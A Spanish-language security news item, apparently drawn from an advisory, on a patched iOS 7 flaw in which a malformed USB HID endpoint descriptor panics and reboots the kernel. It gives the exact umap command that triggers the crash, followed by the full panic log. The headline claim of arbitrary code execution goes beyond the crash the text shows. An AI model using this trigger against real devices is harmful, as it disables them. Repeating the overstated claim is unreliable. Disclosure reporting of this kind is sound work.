Una falla en iOS 7 permitió la ejecución de código arbitrario en modo kernel causando el reinicio del iPhone, Apple emite una solución

Cuando todas las miradas están puestas en el futuro lanzamiento de iOS 8, un investigador de seguridad ha encontrado una falla de alto riesgo en el sistema operativo actual que se ejecuta en los dispositivos iPhone, iPad y iPod Touch. Según la Prueba de Concepto presentada por el investigador de seguridad Andy Davis, ha descubierto una falla en iOS 7 que permite la ejecución de código arbitrario de alto riesgo en modo kernel. Una vez que se ejecuta este código, el kernel del dispositivo iOS se bloquea y se reinicia.

• *

Andy había presentado la prueba de concepto a Apple Inc el 26 de septiembre de 2013 y finalmente, el 10 de marzo de 2014, Apple lanzó un parche para mitigar esta falla. Todo el código está disponible en Github. A continuación se presentan breves detalles sobre la ejecución :

Descripción de la Vulnerabilidad

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Cuando se proporciona un valor específico en el descriptor de punto final USB para un dispositivo HID

el kernel del dispositivo Apple se bloquea y se reinicia

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Detalles Técnicos

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

El error se puede activar usando umap (https://github.com/nccgroup/umap)

como sigue:

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

Identificador del Incidente: F0856C91-7616-4DAC-9907-C504401D9951

Clave de CrashReporter: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b

Modelo de Hardware: iPhone3,1

Fecha/Hora: 2013-09-26 12:35:46.892 +0100

Versión del SO: iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,

fault_addr=0x28

r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe

r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78

r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001

r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8

cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Mensaje del depurador: panic

versión del SO: 11A465

versión del kernel: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;

root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X

iBoot versión: iBoot-1940.1.75

¿inicio seguro?: SÍ

versión del Paniclog: 1

deslizamiento del kernel: 0x0000000008200000

base de texto del kernel: 0x88201000

Tiempo de Época: sec usec

Arranque : 0x52441b69 0x00000000

Dormir : 0x00000000 0x00000000

Despertar : 0x00000000 0x00000000

Calendario: 0x52441bb5 0x00056497

Tarea en pánico 0x896f8d48: 12856 páginas, 114 hilos: pid 0: kernel_task
pánico de hilo: 0x8023de90, rastreo de pila: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000

Apple ha dado a esta falla el Número de Referencia 600217059 y ha lanzado un parche para mitigar la vulnerabilidad que se puede descargar aquí.

• *

*Recurso : CXSECURITY